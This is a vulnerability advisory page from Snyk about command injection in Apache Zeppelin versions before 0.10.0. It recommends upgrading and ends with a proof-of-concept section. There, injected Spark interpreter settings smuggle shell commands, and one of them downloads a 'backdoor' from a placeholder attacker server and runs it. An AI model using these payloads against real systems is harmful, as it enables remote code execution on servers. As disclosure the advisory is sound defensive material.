Command Injection Affecting org.apache.zeppelin:zeppelin Open this link in a new tab package, versions [,0.10.0)


0.0
medium
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-ORGAPACHEZEPPELIN-1583438

  • published

    8 Sep 2021

  • disclosed

    7 Sep 2021

  • credit

    HERE Security Team

How to fix?

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

Overview

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings.

PoC

# Insert into Spark interpreter settings
# This example will also crash Spark jobs because command line is truncated
spark.executor.memory=16g;touch${IFS%?}/tmp/test

Or another example, in this case Spark jobs will be executed normally without interruption

spark.driver.cores=2{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}